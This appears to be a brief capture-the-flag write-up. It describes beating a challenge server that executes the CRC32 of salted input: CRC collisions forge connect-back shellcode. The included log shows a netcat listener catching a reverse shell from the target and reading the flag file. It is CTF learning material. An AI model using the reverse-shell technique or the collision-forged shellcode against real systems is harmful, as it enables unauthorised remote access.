The task provide us the source of the server that is running. The aim is to spawn a shell but there is one problem: the data we sent over the connection will be crc32’d with a known salt ,that will be printed once we establish the connection so , and THEN executed so the payload we’ll send isn’t the one the evaluator will execute but the result of crc32(salt+payload). To get the an arbitrary value from the crc32 result we used a collider generator (http://code.google.com/p/lxyppc-snake/source/browse/trunk/crccrash/crccrash.c). As shellcode we used a connect back one that spawn a shell to our local. Code: http://pastebin.com/iMtgJpQQ

root@kaiman:~$ nc -lvp 7878
listening on [any] 7878 ...
connect to [1: not found from ec2-54-178-232-195.ap-northeast-1.compute.amazonaws.com [54.178.232.195] 40444
$ ls
bin
boot
dev
-- snip --
usr
var
vmlinuz
$ ls /home
sc
ubuntu
$ ls /home/sc
flag
sc.py
thisisnotbad
$ cat /home/sc/flag
a2fa361c9aabf6a541a1c6ac8b32fcb9</blockquote>

Razor4x